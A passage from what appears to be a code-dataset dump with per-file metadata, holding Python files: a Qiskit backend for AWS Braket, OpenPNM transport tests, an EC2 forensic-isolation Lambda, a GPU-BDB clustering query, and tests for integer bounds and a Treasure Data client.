super().__init__(aws_device_2_configuration(aws_device), provider) self._aws_device = aws_device self._run = aws_device.run def properties(self) -> BackendProperties: properties: DeviceCapabilities = self._aws_device.properties if isinstance(properties, IonqDeviceCapabilities): return aws_ionq_to_properties(properties, self._configuration) if isinstance(properties, RigettiDeviceCapabilities): return aws_rigetti_to_properties(properties, self._configuration) if isinstance(properties, GateModelSimulatorDeviceCapabilities): return aws_simulator_to_properties(properties, self._configuration) def status(self) -> BackendStatus: # now = datetime.now() # windows = self._aws_device.properties.service.executionWindows # is_in_execution_window = windows. 
status: str = self._aws_device.status backend_status: BackendStatus = BackendStatus( backend_name=self.name(), backend_version=self.version(), operational=False, pending_jobs=0, # TODO status_msg=status ) if status == 'ONLINE': backend_status.operational = True elif status == 'OFFLINE': backend_status.operational = False else: backend_status.operational = False return backend_status def _get_job_data_s3_folder(self, job_id): return f"results-{self.name()}-{job_id}" @staticmethod def _exists_file(s3_client, s3_bucket: str, file: str): result: dict = s3_client.list_objects_v2( Bucket=s3_bucket, Prefix=file ) # TODO: error handling return result['KeyCount'] != 0 def _save_job_task_arns(self, job_id: str, task_arns: List[str], s3_bucket: Optional[str] = None) -> AwsSession.S3DestinationFolder: used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json' if AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does already exist in the bucket {used_s3_bucket}") result = s3_client.put_object(Body=json.dumps(task_arns).encode(), Bucket=used_s3_bucket, Key=file) # TODO: error handling return used_s3_bucket, self._get_job_data_s3_folder(job_id=job_id) def _delete_job_task_arns(self, job_id: str, s3_bucket: Optional[str] = None): used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json' if not AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}") result: dict = s3_client.delete_object(Bucket=used_s3_bucket, Key=file) # TODO: error handling def _load_job_task_arns(self, job_id: str, s3_bucket: Optional[str] = None) -> List[str]: used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/task_arns.json' if not AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}") result: dict = s3_client.get_object(Bucket=used_s3_bucket, Key=file) # TODO: error handling streaming_body: StreamingBody = result['Body'] data: bytes = streaming_body.read() task_arns = json.loads(data.decode()) return task_arns def _save_job_data_s3(self, qobj: QasmQobj, s3_bucket: Optional[str] = None, extra_data: Optional[dict] = None) -> AwsSession.S3DestinationFolder: used_s3_bucket: str = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=qobj.qobj_id)}/qiskit_qobj_data.json' if AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' already exists at the bucket {used_s3_bucket}") body = { 'qobj_id': qobj.qobj_id, 'qobj': qobj.to_dict() } if extra_data: body['extra_data'] = extra_data result = s3_client.put_object(Body=json.dumps(body).encode(), Bucket=used_s3_bucket, Key=file) # TODO: error handling return used_s3_bucket, self._get_job_data_s3_folder(job_id=qobj.qobj_id) def _delete_job_data_s3(self, job_id: str, s3_bucket: Optional[str] = None): used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/qiskit_qobj_data.json' if not 
AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}") result: dict = s3_client.delete_object(Bucket=used_s3_bucket, Key=file) # TODO: error handling def _load_job_data_s3(self, job_id: str, s3_bucket: Optional[str] = None) -> Tuple[QasmQobj, dict]: used_s3_bucket = s3_bucket or self._provider.get_default_bucket() s3_client = self._provider.get_s3_client() file = f'{self._get_job_data_s3_folder(job_id=job_id)}/qiskit_qobj_data.json' if not AWSBackend._exists_file(s3_client, used_s3_bucket, file): raise ValueError(f"An object '{file}' does not exist in the bucket {used_s3_bucket}") result: dict = s3_client.get_object(Bucket=used_s3_bucket, Key=file) # TODO: error handling streaming_body: StreamingBody = result['Body'] data: bytes = streaming_body.read() stored_experiment_data = json.loads(data.decode()) assert 'qobj' in stored_experiment_data qobj_raw = stored_experiment_data['qobj'] qobj = QasmQobj.from_dict(qobj_raw) extra_data = stored_experiment_data.get('extra_data', {}) return qobj, extra_data def _create_task(self, job_id: str, qc: Circuit, shots: int, s3_bucket: Optional[str] = None) -> AwsQuantumTask: used_s3_bucket: str = s3_bucket or self._provider.get_default_bucket() task: AwsQuantumTask = self._aws_device.run( task_specification=qc, s3_destination_folder=(used_s3_bucket, self._get_job_data_s3_folder(job_id)), shots=shots ) return task def jobs( self, limit: int = 10, skip: int = 0, status: Optional[Union[JobStatus, str, List[Union[JobStatus, str]]]] = None, job_name: Optional[str] = None, start_datetime: Optional[datetime] = None, end_datetime: Optional[datetime] = None, job_tags: Optional[List[str]] = None, job_tags_operator: Optional[str] = "OR", descending: bool = True, db_filter: Optional[Dict[str, Any]] = None ) -> List['awsjob.AWSJob']: # TODO: use job tags as meta data on s3, else use the method of active_jobs pass def active_jobs(self, limit: int = 10) -> List['awsjob.AWSJob']: client = self._provider._aws_session.braket_client task_arns = [] nextToken = 'init' while nextToken is not None: result: dict = client.search_quantum_tasks( filters=[{ 'name': self.name(), 'operator': 'EQUAL', 'values': ['CREATED', 'QUEUED', 'RUNNING'] } ], maxResults=limit, nextToken=None if nextToken == 'init' or nextToken is None else nextToken ) # TODO: build all task_arns, query s3 for all keys with task_arns.json, see to which task a job associated, load the jobs via job_id pass def retrieve_job(self, job_id: str, s3_bucket: Optional[str] = None) -> 'awsjob.AWSJob': qobj, extra_data = self._load_job_data_s3(job_id=job_id, s3_bucket=s3_bucket) arns = self._load_job_task_arns(job_id=job_id, s3_bucket=s3_bucket) tasks = [AwsQuantumTask(arn=arn) for arn in arns] job = awsjob.AWSJob( job_id=job_id, qobj=qobj, tasks=tasks, extra_data=extra_data, s3_bucket=s3_bucket, backend=self ) return job def estimate_costs(self, qobj: QasmQobj) -> Optional[float]: shots = qobj.config.shots no_experiments = len(qobj.experiments) cost: DeviceCost = self._aws_device.properties.service.deviceCost if cost.unit == 'shot': return shots * no_experiments * cost.price elif cost.unit == 'hour': time_per_experiment = timedelta(seconds=10) # TODO: make this a better estimate: depends on no_qubits and depth total_time = shots * no_experiments * time_per_experiment return total_time.total_seconds() / 60 / 60 * cost.price else: return None def run(self, qobj: QasmQobj, s3_bucket: Optional[str] = None, extra_data: Optional[dict] = 
None): # If we get here, then we can continue with running, else ValueError! circuits: List[Circuit] = list(convert_qasm_qobj(qobj)) shots = qobj.config.shots tasks: List[AwsQuantumTask] = [] try: s3_location: AwsSession.S3DestinationFolder = self._save_job_data_s3(qobj, s3_bucket=s3_bucket, extra_data=extra_data) for circuit in circuits: task = self._aws_device.run( task_specification=circuit, s3_destination_folder=s3_location, shots=shots ) tasks.append(task) task_arns = [t.id for t in tasks] self._save_job_task_arns(job_id=qobj.qobj_id, task_arns=task_arns, s3_bucket=s3_location[0]) except Exception as ex: logger.error(f'During creation of tasks an error occurred: {ex}') logger.error(f'Cancelling all tasks {len(tasks)}!') for task in tasks: logger.error(f'Attempt to cancel {task.id}...') task.cancel() logger.error(f'State of {task.id}: {task.state()}.') self._delete_job_task_arns(qobj.qobj_id, s3_bucket=s3_bucket) self._delete_job_data_s3(qobj.qobj_id, s3_bucket=s3_bucket) raise ex job = awsjob.AWSJob( job_id=qobj.qobj_id, qobj=qobj, tasks=tasks, extra_data=extra_data, s3_bucket=s3_location[0], backend=self ) return job
45.138889
144
0.666923
11,324
0.871077
0
0
257
0.019769
0
0
2,461
0.189308
fe2ffb0cf28c08ae4282aa561c6f775796ff339b
14,564
py
Python
test/unit/Algorithms/GenericLinearTransportTest.py
thirtywang/OpenPNM
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
[ "MIT" ]
null
null
null
test/unit/Algorithms/GenericLinearTransportTest.py
thirtywang/OpenPNM
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
[ "MIT" ]
null
null
null
test/unit/Algorithms/GenericLinearTransportTest.py
thirtywang/OpenPNM
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
[ "MIT" ]
1
2020-07-02T02:21:10.000Z
2020-07-02T02:21:10.000Z
import OpenPNM import numpy as np import OpenPNM.Physics.models as pm class GenericLinearTransportTest: def setup_class(self): self.net = OpenPNM.Network.Cubic(shape=[5, 5, 5]) self.phase = OpenPNM.Phases.GenericPhase(network=self.net) Ps = self.net.Ps Ts = self.net.Ts self.phys = OpenPNM.Physics.GenericPhysics(network=self.net, phase=self.phase, pores=Ps, throats=Ts) self.phys['throat.cond'] = 5e-8 self.alg = OpenPNM.Algorithms.GenericLinearTransport(network=self.net, phase=self.phase) def test_set_BC_modes_pores(self): BC1_pores = np.arange(25, 35) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC1_pores) ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == BC1_pores) BC2_pores = np.arange(43, 50) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC2_pores, mode='merge') ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == np.concatenate((BC1_pores, BC2_pores))) BC3_pores = np.arange(4, 9) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC3_pores, mode='overwrite') ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == BC3_pores) BC4_pores = [11, 90] self.alg.set_boundary_conditions(bctype='Neumann', bcvalue=0.5, pores=BC4_pores, mode='overwrite') ptest = self.alg.pores('pore.Neumann') assert np.all(ptest == BC4_pores) self.alg.set_boundary_conditions(bctype='Dirichlet', pores=BC1_pores, bcvalue=0.3) ptest = self.alg.pores('pore.Dirichlet') self.alg.set_boundary_conditions(bctype='Dirichlet', pores=self.alg.Ps, mode='remove') Dp = np.sum(self.alg['pore.Dirichlet']) assert Dp == 0 self.alg.set_boundary_conditions(bctype='Neumann', mode='remove') label = 'pore.Neumann' assert (label not in self.alg.labels()) def test_set_BC_modes_throats(self): BC1_throats = np.arange(25, 35) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC1_throats) t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == BC1_throats) BC2_throats = np.arange(43, 50) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC2_throats, mode='merge') t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == np.concatenate((BC1_throats, BC2_throats))) BC3_throats = np.arange(4, 9) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC3_throats, mode='overwrite') t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == BC3_throats) BC4_throats = [11, 90] self.alg.set_boundary_conditions(bctype='Neumann', bcvalue=0.5, throats=BC4_throats, mode='overwrite') t_test = self.alg.throats('throat.Neumann') assert np.all(t_test == BC4_throats) self.alg.set_boundary_conditions(bctype='Dirichlet', throats=BC1_throats, bcvalue=0.3) t_test = self.alg.throats('throat.Dirichlet') self.alg.set_boundary_conditions(bctype='Dirichlet', throats=self.alg.Ts, mode='remove') Dp = np.sum(self.alg['throat.Dirichlet']) assert Dp == 0 self.alg.set_boundary_conditions(bctype='Neumann', mode='remove') label = 'throat.Neumann' assert (label not in self.alg.labels()) def test_set_BC_modes_with_boolean_masks_pores(self): BC1_pores = np.zeros(self.alg.Np, dtype='bool') BC1_pores[np.arange(25, 35)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC1_pores) ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == self.alg._parse_locations(BC1_pores)) BC2_pores = np.zeros(self.alg.Np, dtype='bool') BC2_pores[np.arange(43, 50)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC2_pores, 
mode='merge') ptest = self.alg.pores('pore.Dirichlet') B1 = self.alg._parse_locations(BC1_pores) B2 = self.alg._parse_locations(BC2_pores) assert np.all(ptest == np.concatenate((B1, B2))) BC3_pores = np.zeros(self.alg.Np, dtype='bool') BC3_pores[np.arange(4, 9)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, pores=BC3_pores, mode='overwrite') ptest = self.alg.pores('pore.Dirichlet') assert np.all(ptest == self.alg._parse_locations(BC3_pores)) BC4_pores = np.zeros(self.alg.Np, dtype='bool') BC4_pores[[11, 90]] = True self.alg.set_boundary_conditions(bctype='Neumann', bcvalue=0.5, pores=BC4_pores, mode='overwrite') ptest = self.alg.pores('pore.Neumann') assert np.all(ptest == self.alg._parse_locations(BC4_pores)) self.alg.set_boundary_conditions(bctype='Dirichlet', pores=BC1_pores, bcvalue=0.3) ptest = self.alg.pores('pore.Dirichlet') removed_p = self.alg._parse_locations(self.alg.Ps) self.alg.set_boundary_conditions(bctype='Dirichlet', pores=removed_p, mode='remove') Dp = np.sum(self.alg['pore.Dirichlet']) assert Dp == 0 self.alg.set_boundary_conditions(bctype='Neumann', mode='remove') label = 'pore.Neumann' assert (label not in self.alg.labels()) def test_set_BC_modes_with_boolean_masks_throats(self): BC1_throats = np.zeros(self.alg.Nt, dtype='bool') BC1_throats[np.arange(25, 35)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC1_throats) t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == self.alg._parse_locations(BC1_throats)) BC2_throats = np.zeros(self.alg.Nt, dtype='bool') BC2_throats[np.arange(43, 50)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC2_throats, mode='merge') t_test = self.alg.throats('throat.Dirichlet') B1 = self.alg._parse_locations(BC1_throats) B2 = self.alg._parse_locations(BC2_throats) assert np.all(t_test == np.concatenate((B1, B2))) BC3_throats = np.zeros(self.alg.Nt, dtype='bool') BC3_throats[np.arange(4, 9)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC3_throats, mode='overwrite') t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == self.alg._parse_locations(BC3_throats)) BC4_throats = np.zeros(self.alg.Nt, dtype='bool') BC4_throats[[11, 90]] = True self.alg.set_boundary_conditions(bctype='Neumann', bcvalue=0.5, throats=BC4_throats, mode='overwrite') t_test = self.alg.throats('throat.Neumann') assert np.all(t_test == self.alg._parse_locations(BC4_throats)) self.alg.set_boundary_conditions(bctype='Dirichlet', throats=BC1_throats, bcvalue=0.3) t_test = self.alg.throats('throat.Dirichlet') removed_t = self.alg._parse_locations(self.alg.Ts) self.alg.set_boundary_conditions(bctype='Dirichlet', throats=removed_t, mode='remove') Dp = np.sum(self.alg['throat.Dirichlet']) assert Dp == 0 self.alg.set_boundary_conditions(bctype='Neumann', mode='remove') label = 'pore.Neumann' assert (label not in self.alg.labels()) def test_super_pore_conductance(self): g_super = [] BC1_pores = np.arange(20, 30) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.4, pores=BC1_pores) BC2_pores = np.arange(45, 66) self.alg.set_boundary_conditions(bctype='Neumann_group', bcvalue=1.4e-10, pores=BC2_pores) g_super.append(2e-12) BC3_pores = np.arange(87, 94) self.alg.set_boundary_conditions(bctype='Neumann_group', bcvalue=-0.9e-10, pores=BC3_pores) g_super.append(np.ones(len(BC3_pores)) * 1.5e-12) BC4_pores = np.arange(3, 7) self.alg.set_boundary_conditions(bctype='Neumann_group', bcvalue=0.1e-10, pores=BC4_pores) 
g_super.append(np.array([6.42e-13])) self.alg.run(conductance='throat.cond', quantity='pore.mole_fraction', super_pore_conductance=g_super) self.alg.return_results() r1 = self.alg.rate(BC1_pores)[0] r2 = self.alg.rate(BC2_pores)[0] r3 = self.alg.rate(BC3_pores)[0] r4 = self.alg.rate(BC4_pores)[0] assert np.absolute(r1 + r2 + r3 + r4) < 1e-20 assert np.size(self.alg.super_pore_conductance[0]) == 1 assert np.size(self.alg.super_pore_conductance[1]) == 7 assert np.size(self.alg.super_pore_conductance[2]) == 1 def test_source_term_modes(self): self.phys['pore.item1'] = 0.5e-12 self.phys['pore.item2'] = 2.5 self.phys['pore.item3'] = -1.4e-11 self.phys.models.add(propname='pore.A', model=pm.generic_source_term.power_law, A1='pore.item1', A2='pore.item2', A3='pore.item3', x='mole_fraction', return_rate=False, regen_mode='on_demand') self.phys.models.add(propname='pore.B', model=pm.generic_source_term.linear, A1='pore.item1', A2='pore.item3', x='mole_fraction', return_rate=False, regen_mode='on_demand') S1_pores = np.arange(25, 35) self.alg.set_source_term(source_name=['pore.A', 'pore.B'], pores=S1_pores) mask1 = ~np.isnan(self.alg['pore.source_nonlinear_s1_A']) mask2 = ~np.isnan(self.alg['pore.source_nonlinear_s2_A']) assert np.all(self.alg.Ps[mask1] == S1_pores) assert np.all(self.alg.Ps[mask2] == S1_pores) self.alg.set_source_term(source_name='pore.A', pores=[26], x0=np.ones(self.phys.Np), mode='update') assert self.alg['pore.source_nonlinear_s1_A'][26] == 1.25e-12 S2_pores = np.array([30, 31]) self.alg.set_source_term(source_name='pore.A', pores=S2_pores, mode='overwrite') mask1 = ~np.isnan(self.alg['pore.source_nonlinear_s1_A']) assert np.all(self.alg.Ps[mask1] == S2_pores) self.alg.set_source_term(source_name='pore.B', pores=S1_pores, mode='remove') mask1 = np.isnan(self.alg['pore.source_nonlinear_s1_B']) assert np.all(self.alg.Ps[mask1] == self.alg.Ps) self.alg.set_source_term(source_name=['pore.A', 'pore.B'], pores=self.alg.Ps, mode='remove') assert ('pore.source_B' in self.alg.labels()) assert ('pore.source_A' in self.alg.labels()) self.alg.set_source_term(source_name=['pore.A', 'pore.B'], mode='remove') assert ('pore.source_B' not in self.alg.labels()) assert ('pore.source_A' not in self.alg.labels())
51.101754
78
0.49025
14,491
0.994988
0
0
0
0
0
0
1,559
0.107045
fe3002f8ab77d8668df51f08f7789bc9628e8c1f
2,370
py
Python
EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py
spartantri/aws-security-automation
a3904931220111022d12e71a3d79e4a85fc82173
[ "Apache-2.0" ]
null
null
null
EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py
spartantri/aws-security-automation
a3904931220111022d12e71a3d79e4a85fc82173
[ "Apache-2.0" ]
null
null
null
EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py
spartantri/aws-security-automation
a3904931220111022d12e71a3d79e4a85fc82173
[ "Apache-2.0" ]
null
null
null
# MIT No Attribution # Permission is hereby granted, free of charge, to any person obtaining a copy of this # software and associated documentation files (the "Software"), to deal in the Software # without restriction, including without limitation the rights to use, copy, modify, # merge, publish, distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, # INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A # PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE # SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. import boto3 import os def lambda_handler(event, context): # TODO implement print(event) client = boto3.client('ec2') instanceID = event.get('instanceID') response = client.describe_instances( InstanceIds=[ instanceID ] ) volumeID = response['Reservations'][0]['Instances'][0]['BlockDeviceMappings'][0]['Ebs']['VolumeId'] print(volumeID) SnapShotDetails = client.create_snapshot( Description='Isolated Instance', VolumeId=volumeID ) client.create_tags(Resources=[SnapShotDetails['SnapshotId']], Tags=[{'Key': 'Name', 'Value': instanceID}]) # TODO Dump Response into S3 - response # TODO Dump Response details into Snapshot - SnapShotDetails['SnapshotId'] print(response) print(SnapShotDetails['SnapshotId']) response = client.modify_instance_attribute( Groups=[ os.environ['ISOLATED_SECUTRITYGROUP'], ], InstanceId=instanceID ) tagresponse = client.create_tags( Resources=[ instanceID, ], Tags=[ { 'Key': 'IsIsolated', 'Value': 'InstanceIsolated' }, ] ) waiter = client.get_waiter('snapshot_completed') waiter.wait( SnapshotIds=[ SnapShotDetails['SnapshotId'], ] ) # event['SnapshotId'] = SnapShotDetails['SnapshotId'] return SnapShotDetails['SnapshotId']
33.857143
110
0.670042
0
0
0
0
0
0
0
0
1,321
0.557384
fe30812932f608889eaceef38afb76f593b3db27
3,830
py
Python
gpu_bdb/queries/q26/gpu_bdb_query_26.py
VibhuJawa/gpu-bdb
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
[ "Apache-2.0" ]
62
2020-05-14T13:33:02.000Z
2020-10-29T13:28:26.000Z
gpu_bdb/queries/q26/gpu_bdb_query_26.py
VibhuJawa/gpu-bdb
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
[ "Apache-2.0" ]
104
2020-07-01T21:07:42.000Z
2020-11-13T16:36:04.000Z
gpu_bdb/queries/q26/gpu_bdb_query_26.py
VibhuJawa/gpu-bdb
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
[ "Apache-2.0" ]
21
2020-05-14T14:44:40.000Z
2020-11-07T12:08:28.000Z
# # Copyright (c) 2019-2022, NVIDIA CORPORATION. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from bdb_tools.utils import ( benchmark, gpubdb_argparser, train_clustering_model, run_query, ) from bdb_tools.q26_utils import ( Q26_CATEGORY, Q26_ITEM_COUNT, N_CLUSTERS, CLUSTER_ITERATIONS, N_ITER, read_tables ) import numpy as np from dask import delayed def agg_count_distinct(df, group_key, counted_key): """Returns a Series that is the result of counting distinct instances of 'counted_key' within each 'group_key'. The series' index will have one entry per unique 'group_key' value. Workaround for lack of nunique aggregate function on Dask df. """ return ( df.drop_duplicates([group_key, counted_key]) .groupby(group_key)[counted_key] .count() ) def get_clusters(client, kmeans_input_df): import dask_cudf ml_tasks = [ delayed(train_clustering_model)(df, N_CLUSTERS, CLUSTER_ITERATIONS, N_ITER) for df in kmeans_input_df.to_delayed() ] results_dict = client.compute(*ml_tasks, sync=True) output = kmeans_input_df.index.to_frame().reset_index(drop=True) labels_final = dask_cudf.from_cudf( results_dict["cid_labels"], npartitions=output.npartitions ) output["label"] = labels_final.reset_index()[0] # Sort based on CDH6.1 q26-result formatting output = output.sort_values(["ss_customer_sk"]) # Based on CDH6.1 q26-result formatting results_dict["cid_labels"] = output return results_dict def main(client, config): import cudf ss_ddf, items_ddf = benchmark( read_tables, config=config, compute_result=config["get_read_time"], ) items_filtered = items_ddf[items_ddf.i_category == Q26_CATEGORY].reset_index( drop=True ) items_filtered = items_filtered[["i_item_sk", "i_class_id"]] f_ss_ddf = ss_ddf[ss_ddf["ss_customer_sk"].notnull()].reset_index(drop=True) merged_ddf = f_ss_ddf.merge( items_filtered, left_on="ss_item_sk", right_on="i_item_sk", how="inner" ) keep_cols = ["ss_customer_sk", "i_class_id"] merged_ddf = merged_ddf[keep_cols] # One-Hot-Encode i_class_id merged_ddf = merged_ddf.map_partitions( cudf.get_dummies, columns=["i_class_id"], prefix="id", cats={"i_class_id": np.arange(1, 16, dtype="int32")}, prefix_sep="", dtype="float32", ) merged_ddf["total"] = 1.0 # Will keep track of total count all_categories = ["total"] + ["id%d" % i for i in range(1, 16)] # Aggregate using agg to get sorted ss_customer_sk agg_dict = dict.fromkeys(all_categories, "sum") rollup_ddf = merged_ddf.groupby("ss_customer_sk").agg(agg_dict) rollup_ddf = rollup_ddf[rollup_ddf.total > Q26_ITEM_COUNT][all_categories[1:]] # Prepare data for KMeans clustering rollup_ddf = rollup_ddf.astype("float64") kmeans_input_df = rollup_ddf.persist() results_dict = get_clusters(client=client, kmeans_input_df=kmeans_input_df) return results_dict if __name__ == "__main__": from bdb_tools.cluster_startup import attach_to_cluster config = gpubdb_argparser() client, bc = attach_to_cluster(config) run_query(config=config, client=client, query_func=main)
31.138211
115
0.703655
0
0
0
0
0
0
0
0
1,332
0.347781
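A minimal standalone sketch of the distinct-count workaround documented in agg_count_distinct above, run on a tiny in-memory pandas frame (the toy data is illustrative only); it checks that drop_duplicates + groupby + count matches a direct nunique:

import pandas as pd

# Toy data: three customers buying items from a handful of classes.
df = pd.DataFrame({
    "ss_customer_sk": [1, 1, 1, 2, 2, 3],
    "i_class_id":     [10, 10, 11, 12, 12, 10],
})

# Same recipe as agg_count_distinct: drop duplicate (group, value) pairs,
# then a plain per-group count gives the number of distinct values.
workaround = (
    df.drop_duplicates(["ss_customer_sk", "i_class_id"])
      .groupby("ss_customer_sk")["i_class_id"]
      .count()
)

# Reference result using pandas' built-in nunique aggregate.
reference = df.groupby("ss_customer_sk")["i_class_id"].nunique()

assert workaround.equals(reference)
print(workaround)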
fe317187c1c12b8c77ea5e51802f388e760744e4
1,324
py
Python
tests/test_intbounds.py
alex/optimizer-model
0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98
[ "BSD-3-Clause" ]
4
2015-04-29T22:49:25.000Z
2018-02-16T09:06:08.000Z
tests/test_intbounds.py
alex/optimizer-model
0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98
[ "BSD-3-Clause" ]
null
null
null
tests/test_intbounds.py
alex/optimizer-model
0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98
[ "BSD-3-Clause" ]
null
null
null
from optimizer.utils.intbounds import IntBounds class TestIntBounds(object): def test_make_gt(self): i0 = IntBounds() i1 = i0.make_gt(IntBounds(10, 10)) assert i1.lower == 11 def test_make_gt_already_bounded(self): i0 = IntBounds() i1 = i0.make_gt(IntBounds(10, 10)).make_gt(IntBounds(0, 0)) assert i1.lower == 11 def test_make_lt(self): i0 = IntBounds() i1 = i0.make_lt(IntBounds(10, 10)) assert i1.upper == 9 def test_make_lt_already_bounded(self): i0 = IntBounds() i1 = i0.make_lt(IntBounds(0, 0)).make_lt(IntBounds(10, 10)) assert i1.upper == -1 def test_both_bounds(self): i0 = IntBounds() i1 = i0.make_lt(IntBounds(10, 10)).make_gt(IntBounds(0, 0)) assert i1.upper == 9 assert i1.lower == 1 i2 = i0.make_gt(IntBounds(0, 0)).make_lt(IntBounds(10, 10)) assert i2.lower == 1 assert i2.upper == 9 def test_make_le_already_bounded(self): i0 = IntBounds() i1 = i0.make_le(IntBounds(0, 0)).make_le(IntBounds(2, 2)) assert i1.upper == 0 def test_make_ge_already_bounded(self): i0 = IntBounds() i1 = i0.make_ge(IntBounds(10, 10)).make_ge(IntBounds(0, 0)) assert i1.lower == 10
23.22807
67
0.5929
1,273
0.96148
0
0
0
0
0
0
0
0
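A small self-contained sketch of the bound semantics these tests assert (make_gt/make_lt shift the bound by one, make_ge/make_le copy it, and an already-tighter bound is kept); this is illustrative only, not the optimizer's actual IntBounds implementation:

class SketchBounds:
    # Illustrative only: integer bounds where None means "unbounded on that side".
    def __init__(self, lower=None, upper=None):
        self.lower = lower
        self.upper = upper

    def _with_lower(self, candidate):
        new = SketchBounds(self.lower, self.upper)
        if new.lower is None or candidate > new.lower:
            new.lower = candidate
        return new

    def _with_upper(self, candidate):
        new = SketchBounds(self.lower, self.upper)
        if new.upper is None or candidate < new.upper:
            new.upper = candidate
        return new

    def make_gt(self, other):
        return self._with_lower(other.lower + 1)   # strictly greater

    def make_ge(self, other):
        return self._with_lower(other.lower)

    def make_lt(self, other):
        return self._with_upper(other.upper - 1)   # strictly less

    def make_le(self, other):
        return self._with_upper(other.upper)


# Mirrors test_both_bounds: exclusive bounds at 0 and 10 give the range [1, 9].
b = SketchBounds().make_gt(SketchBounds(0, 0)).make_lt(SketchBounds(10, 10))
assert (b.lower, b.upper) == (1, 9)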
fe3188f73830a0839c72948677e1605c9ae2ae83
1,586
py
Python
tdclient/test/database_model_test.py
minchuang/td-client-python
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
[ "Apache-2.0" ]
2
2019-02-22T11:56:17.000Z
2019-02-25T10:09:46.000Z
tdclient/test/database_model_test.py
minchuang/td-client-python
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
[ "Apache-2.0" ]
null
null
null
tdclient/test/database_model_test.py
minchuang/td-client-python
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python from __future__ import print_function from __future__ import unicode_literals try: from unittest import mock except ImportError: import mock from tdclient import models from tdclient.test.test_helper import * def setup_function(function): unset_environ() def test_database(): client = mock.MagicMock() database = models.Database(client, "sample_datasets", tables=["nasdaq", "www_access"], count=12345, created_at="created_at", updated_at="updated_at", org_name="org_name", permission="administrator") assert database.org_name == "org_name" assert database.permission == "administrator" assert database.count == 12345 assert database.name == "sample_datasets" assert database.tables() == ["nasdaq", "www_access"] assert database.created_at == "created_at" assert database.updated_at == "updated_at" def test_database_update_tables(): client = mock.MagicMock() client.tables = mock.MagicMock(return_value=[ models.Table(client, "sample_datasets", "foo", 